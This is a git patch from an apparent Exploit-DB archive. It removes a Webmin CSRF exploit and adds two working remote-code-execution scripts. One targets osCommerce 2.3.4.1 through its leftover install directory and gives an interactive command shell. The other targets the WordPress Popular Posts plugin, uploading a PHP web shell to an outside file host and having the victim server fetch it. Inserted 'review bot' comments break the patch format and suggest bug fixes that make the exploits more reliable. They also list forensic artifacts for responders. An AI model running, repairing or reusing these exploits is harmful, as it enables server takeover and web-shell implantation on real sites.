From 680397ce33f9bfec3b2a688dbb94099f5b5cfa55 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 16 Jul 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-07-16 4 changes to exploits/shellcodes Webmin 1.973 - Cross-Site Request Forgery (CSRF) osCommerce 2.3.4.1 - Remote Code Execution (2) WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
---
exploits/linux/webapps/50126.py | 230 ---------------------------
exploits/php/webapps/50128.py | 89 +++++++++++
exploits/php/webapps/50129.py | 271 ++++++++++++++++++++++++++++++++
files_exploits.csv | 3 +-
4 files changed, 362 insertions(+), 231 deletions(-)
delete mode 100755 exploits/linux/webapps/50126.py
create mode 100755 exploits/php/webapps/50128.py
create mode 100755 exploits/php/webapps/50129.py
diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py
deleted file mode 100755
index 30c9c6946..000000000
--- a/exploits/linux/webapps/50126.py
+++ /dev/null
@@ -1,230 +0,0 @@ -# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF) -# Date: 24/04/2021 -# Exploit Author: *Mesh3l_911 & Z0ldyck -# Vendor Homepage: https://www.webmin.com -# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 -# Version: Webmin 1.973 -# Tested on: All versions <= 1.973 -# CVE : CVE-2021-31762 -# POC: https://youtu.be/qCvEXwyaF5U - - -import time, subprocess - -print('''\033[1;37m - - __ __ _ ____ _ _________ _ _ _ -| \/ | | | |___ \| | |___ / _ \| | | | | | -| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ -| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / -| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < -|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ - __/ | - |___/ - - \033[1;m''') - -for i in range(101): - print( - "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( - i), "\033[1;36m%\033[1;m", end="") - time.sleep(0.02) -print("\n\n") - -target = input( - "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") - -if target.endswith('/'): - target = target + 'acl/save_user.cgi' -else: - target = target + '/acl/save_user.cgi' - - -def CSRF_Generator(): - with open('CSRF_POC.html', 'w') as POC: - POC.write \ - (''' - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - ''') - POC.close() - - print( - "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") - - - -def main(): - CSRF_Generator() - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/exploits/php/webapps/50128.py b/exploits/php/webapps/50128.py new file mode 100755 index 000000000..012c61cfb --- /dev/null +++ b/exploits/php/webapps/50128.py 
@@ -0,0 +1,89 @@ +# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) +# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin +# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php +# Notes: The RCE doesn't need to be authenticated +# Date: 26/06/2021 +# Exploit Author: Bryan Leong +# Vendor Homepage: https://www.oscommerce.com/ +# Version: osCommerce 2.3.4 +# Tested on: Windows + +import requests +import sys + +if(len(sys.argv) != 2): + print("please specify the osCommerce url") + print("format: python3 osCommerce2_3_4RCE.py ") + print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog") + sys.exit(0) + +baseUrl = sys.argv[1] +testVulnUrl = baseUrl + '/install/install.php' + +def rce(command): + #targeting the finish step which is step 4 + targetUrl = baseUrl + '/install/install.php?step=4' + + payload = "');" + payload += "passthru('" + command + "');" # injecting system command here + payload += "/*" + + #injecting parameter + data = { + 'DIR_FS_DOCUMENT_ROOT': './', + 'DB_DATABASE' : payload + } + + response = requests.post(targetUrl, data=data) + + if(response.status_code == 200): + #print('[*] Successfully injected payload to config file') + + readCMDUrl = baseUrl + '/install/includes/configure.php' + cmd = requests.get(readCMDUrl) + + commandRsl = cmd.text.split('\n') + + if(cmd.status_code == 200): + #print('[*] System Command Execution Completed') + #removing the error message above + for i in range(2, len(commandRsl)): + print(commandRsl[i]) + else: + return '[!] Configure.php not found' + + + else: + return '[!] 
Fail to inject payload' + + + +#testing vulnerability accessing the directory +test = requests.get(testVulnUrl) + +#checking the install directory still exist or able to access or not +if(test.status_code == 200): + print('[*] Install directory still available, the host likely vulnerable to the exploit.') + + #testing system command injection + print('[*] Testing injecting system command to test vulnerability') + cmd = 'whoami' + + print('User: ', end='') + err = rce(cmd) + + if(err != None): + print(err) + sys.exit(0) + + while(True): + cmd = input('RCE_SHELL$ ') + err = rce(cmd) + + if(err != None): + print(err) + sys.exit(0) + +else: + print('[!] Install directory not found, the host is not vulnerable') + sys.exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50129.py b/exploits/php/webapps/50129.py new file mode 100755 index 000000000..71ddf3c0c --- /dev/null +++ b/exploits/php/webapps/50129.py 
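Review bot: Every failure path in the new script exits with `sys.exit(0)` — the argument-count check, the `[!] Install directory not found` branch and both `err != None` branches — so a wrapper or operator cannot tell failure from success; `sys.exit(1)` is the convention for error exits, and `err is not None` is the idiomatic comparison. The header is internally inconsistent: the title says osCommerce 2.3.4.1 while the `# Version:` line says 2.3.4. For responders, the `# Notes:` line should also spell out what the script leaves behind: `install/includes/configure.php` is rewritten with the injected `DB_DATABASE` value and is never restored, so that file plus a still-reachable `/install/` directory are the artifacts to check, and removing `/install/` after setup (as the `# Vulnerability:` line implies) is the remediation.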
@@ -0,0 +1,271 @@ +# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) +# Date: 15/07/2021 +# Exploit Author: Simone Cristofaro +# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/ +# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip +# Version: 5.3.2 or below +# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27 +# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/ +# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is +# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above. + +# This script will login with the provided credentials, create a new post and add a custom field with the link to a +# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to +# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is +# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;) + +''' +Banner: +''' +banner = """ +* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated) +* @Heisenberg +""" +print(banner) + +''' +Import required modules: +''' +import requests +import argparse +import json +import re +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)') +my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip") +my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port") +my_parser.add_argument('-w', help='--Wordpress path (ie. 
/wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path") +my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username") +my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password") +args = my_parser.parse_args() +target_ip = args.target_ip +target_port = args.target_port +wp_path = args.wp_path +username = args.username +password = args.password + +''' +# Hard coded parameters (if you don't like command line execution) +target_ip = "localhost" +target_port = "80" +wp_path = "/wordpress/" +username = "heisenberg" +password = "heisenberg" +''' + +shell_name = 'exploit.gif.php' +payload = 'GIF
  
' + +print('') +print('[*] Starting Exploit:') + +''' +Upload file +''' +file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) +resp = json.loads(file_json.text) +if resp['status']: + urlshort = resp['data']['file']['url']['full'] +else: + print(f'[-] Error:'+ resp['error']['message']) + exit() + +file_uploaded_site = requests.get(urlshort).text +PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name + +print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Monies Browser 1.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print(f'[+] Authentication successfull as user [{username}] !') +else: + print('[-] Authentication failed ! Check username and password') + exit() + +''' +Verify that the requirements are installed +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' +settings_page = session.get(settings_page_url).text +search_string = ' gd' +if settings_page.find(search_string) == -1 : + print('[-] Error, gd extension for PHP is not installed/enabled on the server ! 
WPP can\'t generate thumbnails.') + exit() + +''' +Get the wpp-admin-token +''' +settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' + +settings_page = session.get(settings_page_url).text +search_string = '' +settings_page = settings_page[settings_page.find(search_string):] +wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] +if wpp_admin_token: + print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') +else: + print('[-] Error while gathering wpp-admin-token !') + exit() + +''' +Apply changes to the Popular Posts plugin +''' +body = { + 'upload_thumb_src': '', + 'thumb_source': 'custom_field', + 'thumb_lazy_load': 1, + 'thumb_field': 'wpp_thumbnail', + 'thumb_field_resize': 1, + 'section': 'thumb', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +if applied_changes.find('

Settings saved.'): + print(f'[+] Settings applied successfully to the Popular Posts plugin. ') +else: + print('[-] Error while applying settings o the Popular Posts plugin!') + exit() + +''' +Empty image cache +''' +body = { + 'action': 'wpp_clear_thumbnail', + 'wpp-admin-token': wpp_admin_token +} +applied_changes = session.post(settings_page_url, headers=header, data=body).text +print(f'[+] Images cache cleared. ') + + +''' +Get the new post ID and Nonce +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php' + +new_post_page = session.get(new_post_url).text +search_string = 'name="_ajax_nonce-add-meta" value="' +search_string_end = '" />' +new_post_page = new_post_page[new_post_page.find(search_string)+35:] +ajax_nonce = new_post_page[:new_post_page.find(search_string_end)] + +search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "' +search_string_end = '" );' +new_post_page = new_post_page[new_post_page.find(search_string)+66:] +wp_nonce = new_post_page[:new_post_page.find(search_string_end)] + +search_string = '},"post":{"id":' +search_string_end = ',' +new_post_page = new_post_page[new_post_page.find(search_string)+15:] +post_ID = new_post_page[:new_post_page.find(search_string_end)] + +if post_ID and wp_nonce and ajax_nonce: + print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].') +else: + if not post_ID: print('[-] Error while gathering post_ID !') + elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !') + elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !') + exit() + +''' +Publish a new post +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user' + +data = {"id":post_ID,"title":"I'm the one who knocks","content":"\n

upgrade your plugins

\n","status":"publish"} +header['X-WP-Nonce'] = wp_nonce +header['Content-Type'] = 'application/json' +header['X-HTTP-Method-Override'] = 'PUT' +new_post_page = session.post(new_post_url, headers=header, json=data).text +if new_post_page.find('"status":"publish"'): + print(f'[+] New post named [I\'m the one who knocks] published correctly!') +else: + print('[-] Error while publishing the new post !') + exit() + +''' +Add the Custom Filed +''' +new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' + +header.pop('X-WP-Nonce') +header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8' +header.pop('X-HTTP-Method-Override') +header['Accept']='*/*' +header['X-Requested-With'] = 'XMLHttpRequest' +body = { + '_ajax_nonce': 0, + 'action': 'add-meta', + 'metakeyselect': 'wpp_thumbnail', + 'metakeyinput': "", + 'metavalue' : PHP_URL, + '_ajax_nonce-add-meta': ajax_nonce, + 'post_id' : post_ID +} +new_post_page = session.post(new_post_url, headers=header, data=body).text + +if new_post_page.find(" Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name) +print('') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b9ebb371d..0312d7284 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
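Review bot: The two success checks on `applied_changes.find('…Settings saved.')` and `new_post_page.find('"status":"publish"')` are inverted: `str.find` returns -1 (truthy) when the marker is absent and 0 (falsy) when it sits at offset 0, so a failed settings save or publish is reported as success; `if 'Settings saved.' in applied_changes:` is the intended test (same for the publish check). `auth.headers['Set-Cookie']` raises KeyError instead of reaching the `Authentication failed` message when the login response carries no Set-Cookie header; `auth.headers.get('Set-Cookie', '')` keeps the intended branch. The header should name the plugin release that fixes the issue (it only says "5.3.2 or below") and, for responders, list the artifacts the script creates: a published post titled "I'm the one who knocks" whose `wpp_thumbnail` custom field points at an external URL, the server-side fetch of that URL, and the resulting file under `wp-content/uploads/wordpress-popular-posts/` named `<post ID>_exploit.gif.php`.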
@@ -26042,7 +26042,6 @@ id,file,description,date,author,type,platform,port 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php, 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php, 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php, -50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux, 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php, @@ -44263,3 +44262,5 @@ id,file,description,date,author,type,platform,port 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php, 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php, 50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php, +50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",2021-07-15,"Bryan Leong",webapps,php, +50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,